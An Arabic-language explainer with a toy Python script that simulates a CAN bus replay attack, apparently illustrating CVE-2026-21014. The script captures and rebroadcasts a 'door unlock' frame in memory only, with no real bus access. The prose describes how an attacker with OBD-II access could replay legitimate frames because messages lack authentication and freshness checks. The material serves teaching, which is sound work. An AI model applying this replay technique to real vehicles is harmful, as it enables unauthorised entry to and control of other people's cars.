
يعيد تشغيل إطارات حافلة CAN الملتقطة لإثبات CVE-2026-21014، موضحًا كيف يتيح غياب المصادقة وفحوصات الحداثة تنفيذ إجراءات غير مصرّح بها على وحدات التحكم الإلكترونية (ECU) في السيارات.
# can_replay_sim.py - Simulates CAN bus replay
import time
can_messages = []
def send_can(msg_id, data):
print(f"CAN {msg_id:#x}: {data.hex()}")
can_messages.append((msg_id, data))
def receive_can():
return can_messages[-1] if can_messages else None
# Simulate car sending "door unlock" command
send_can(0x100, b'\x01\x00\x00\x00') # unlock
# Attacker replays captured frame
time.sleep(1)
captured = receive_can()
if captured:
print("Replaying captured frame...")
send_can(captured[0], captured[1])
لا تطبّق شبكة منطقة التحكم (CAN) الخاصة بالمركبات مصادقة للرسائل أو فحوصات للحداثة. يمكن للمهاجم الذي يملك وصولًا ماديًا إلى منفذ OBD‑II التقاط إطار شرعي (مثل أمر فتح الباب) وإعادة بثه لاحقًا لتنفيذ إجراءات غير مصرح بها.
شغّل المحاكاة:
python can_replay_sim.py
يطبع السكربت عملية التقاط إطار أمر فتح الباب وإعادة بثه.